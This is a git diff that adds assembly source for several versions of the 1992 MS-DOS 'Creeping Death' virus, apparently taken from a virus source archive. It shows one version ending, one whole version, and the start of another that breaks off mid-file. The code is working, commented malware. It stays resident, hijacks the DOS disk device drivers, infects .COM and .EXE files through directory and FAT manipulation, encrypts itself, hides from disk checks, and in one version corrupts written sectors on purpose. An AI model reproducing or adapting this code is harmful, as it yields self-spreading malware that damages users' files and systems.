21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? + jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 ; filename+path available ? + jnb Exec ; yes, execute it + mov ax,cs ; get segment of MCB + dec ax + mov ds,ax + mov cl,8 ; count length of filename + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cl + and cl,7 +NextByte: mov si,8 ; search for this name in the + inc di ; parent PSP to find the path + push di ; to this file + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di ; name found, search for start + cmp byte ptr es:[di-1],0 ; of name+path + jne BeginName + mov si,di + mov bx,es + jmp short Exec ; execute it + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz Exit + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header ; prepare header of the viral + movsw ; device driver and save the + lodsw ; address of the dos strategy + mov es:StrBlock,ax ; and interrupt procedures + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; environment available ? + jz Boot ; no, computer is rebooted + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax ; end of environment is marked + mov di,1 ; with two zero bytes +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset Filename ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h +Exit: mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. ; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx ; store segment and offset of + mov cs:RequestSegment,es ; request block + retf ; return to dos (or whatever + ; called this device driver) + +Interrupt: push ax ; driver strategy block + push bx ; save registers + push cx + push dx + push si + push di + push ds + push es + + les bx,cs:Request ; es:bx = request block + push es ; ds:bx = request block + pop ds + mov al,ds:[bx+2] ; command code + + cmp al,4 ; read sector from disk + je Input + cmp al,8 ; write sector to disk + je Output + cmp al,9 + je Output + + call DoRequest ; let dos do handle the request + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: inc byte ptr cs:Random ; increase counter + jnz Skip ; zero ? + push bx ; yes, change one byte in the + push ds ; sector to write + lds bx,ds:[bx+16h] + inc bh + inc byte ptr ds:[bx] ; destroy some data + pop ds + pop bx +Skip: mov cx,0ff09h + call Check ; check if disk changed + jz Disk ; yes, write virus to disk + jmp InfectSector ; no, just infect sector +Disk: call DoRequest + jmp short InfectDisk + +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jnz InfectDisk ; no, read sector + jmp Read +InfectDisk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +Save: lodsw + push ax + loop Save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz More ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +More: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? + sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector + lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok + not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax ; allocate 1st cluster + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz Here + inc dx + mul dx +Here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] ; allocate last cluster + and ax,di + mov dx,di + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je DiskInfected ; yes, don't write it and go on + mov dx,ds:[si] + mov byte ptr es:[bx+2],8 ; write the adjusted sector to + call DoRequest ; disk + jnz DiskInfected + mov byte ptr es:[bx+2],4 ; read it again + call ReadSector + cmp ds:[si],dx ; is it written correctly ? + jne DiskInfected ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz Less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +Less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +DiskInfected: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +Load: pop ax + stosw + loop Load +Read: call DoRequest ; do request + + mov cx,9 +InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +Find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +Com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +Found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +Pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? + je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +Gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +Rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +Go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +Check: mov ah,ds:[bx+1] ; get number of unit +Drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne Changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +Changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae Fat16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc Continue + mov di,0fff0h + jmp short Continue +Fat16: mov si,2 + mul si + mov di,0ffffh +Continue: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds ; write virus to disk + push cs ; (encrypted) save regs + pop ds + push es + push cs + pop es + cld ; copy forward + mov cx,12 ; length of encryptor + mov si,offset Encrypt ; start of encryptor + mov di,offset EncryptWrite2 ; destenation + inc byte ptr ds:[si+8] ; change xor value + rep movsb ; copy encryptor + mov cl,10 ; copy dorequest proc + mov si,offset DoRequest + rep movsb + mov cl,12 ; copy encryptor + mov si,offset Encrypt + rep movsb + mov ax,0c31fh ; store "pop ds","ret" + stosw ; instructions + pop es ; restore register + jmp EncryptWrite2 ; encrypt and write vir + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +File db "C:",255,0 ; the virus tries to open this + ; file + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Random db ? ; if this byte becomes zero + ; the virus will change the + ; sector that will be written + ; to disk + +Header db 7 dup(?) ; this is the header for the + ; device driver + +Filename db ? ; Buffer for the filename used + ; by the exec-function + + +;*****************************************************************************; +; ; +; The End ; +; ; +;*****************************************************************************; + +code ends ; end of the viral code + +end Encrypt ; start at offset 100h for + ; com-file + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cdeath4.asm b/MSDOS/Virus.MSDOS.Unknown.cdeath4.asm new file mode 100644 index 00000000..8d832a9e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdeath4.asm @@ -0,0 +1,602 @@ +;*****************************************************************************; +; ; +; Creeping Death IV (Encrypting, try to find it) ; +; ; +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code + org 100h + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov bx,offset Main-9 +Repeat: xor byte ptr [bx+8],bl + inc bx + jnz Repeat + +Main: mov sp,600h ; init stack + inc Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? + jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Install: int 20h + +;*****************************************************************************; +; ; +; An file is opend with this name, but the file will not be found. ; +; ; +;*****************************************************************************; + +File: db "C:",255,0 + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz install + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header + movsw + lodsw + mov es:StrBlock,ax + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; =0 ? + jz Boot + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax + mov di,1 +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename + jmp short Exec + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 + jnb Exec + mov ax,cs + dec ax + mov ds,ax + mov cx,8 + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cx + and cx,7 +NextByte: mov si,8 + inc di + push di + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di + cmp byte ptr es:[di-1],0 + jne BeginName + mov si,di + mov bx,es +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h + mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. ; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx + mov cs:RequestSegment,es + retf + +Interrupt: push ax ; driver strategy block + push bx + push cx ; save registers + push dx + push si + push di + push ds + push es + + les bx,cs:Request + push es + pop ds + mov al,ds:[bx+2] ; Command Code + + cmp al,4 ; Input + je Input + cmp al,8 ; Output + je Output + cmp al,9 + je Output + + call DoRequest + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: mov cx,0ff09h ; check if disk changed + call check + jz InfectSector ; no, just infect sector + call DoRequest ; yes, write virus to disk + jmp short inf_dsk + +InfectSector: jmp _InfectSector ; infect sector +Read: jmp _Read ; read sector +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jz Read ; no, read sector +inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +save: lodsw + push ax + loop save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz more ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +more: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? + sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok +SmallModel: not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] + and ax,di + mov dx,di ; allocate cluster + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je _Read_ ; yes, don't write it and go on + mov dx,ds:[si] + push ds + push si + mov byte ptr es:[bx+2],8 ; write + call DoRequest ; write the adjusted sector to + pop si ; disk + pop ds + jnz _Read_ + call ReadSector ; read it again + cmp ds:[si],dx ; is it written correctly ? + jne _Read_ ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +load: pop ax + stosw + loop load +_Read: call DoRequest ; do request + + mov cx,9 +_InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? + je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +check: mov ah,ds:[bx+1] ; get number of unit +drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae fat_16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds + push cs + pop ds + push es + push cs + pop es + cld + mov cx,9 + mov si,offset Encrypt + mov di,offset EncryptWrite2 + mov al,ds:[si+5] + add al,11 + mov ds:[si+5],al + cbw + mov dx,offset Main-1 + sub dx,ax + mov ds:[si+1],dx + rep movsb + mov cl,10 + mov si,offset DoRequest + rep movsb + mov cl,9 + mov si,offset Encrypt + rep movsb + mov ax,0c31fh + stosw + pop es + jmp EncryptWrite2 + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Header db 7 dup(?) ; this is the header for the + ; device driver + +Request equ this dword ; address of the request header +RequestOffset dw ? +RequestSegment dw ? + +bpb_buf: db 32 dup(?) ; buffer for BPB +EncryptWrite2: db 30 dup(?) +f_name: db 80 dup(?) ; Buffer for the filename used + ; by the exec-function + + + +;*****************************************************************************; +; ; +; The End ; +; ; +;*****************************************************************************; + +code ends + +end Encrypt diff --git a/MSDOS/Virus.MSDOS.Unknown.cdeath5.asm b/MSDOS/Virus.MSDOS.Unknown.cdeath5.asm new file mode 100644 index 00000000..c43bb23f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdeath5.asm @@ -0,0 +1,605 @@ +;*****************************************************************************; +; ; +; Creeping Death V (Encrypting, try to find it) ; +; (Version 4 bug Fixed) : +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code + org 5ch + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +BPB_Buf: db 32 dup(?) ; buffer for BPB +EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt + +Request equ this dword ; address of the request header +RequestOffset dw ? +RequestSegment dw ? + + org 100h + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov si,offset Main-1 + mov cx,400h-11 +Repeat: xor byte ptr [si],0 + inc si + loop Repeat + +Main: mov sp,600h ; init stack + inc Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? + jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device 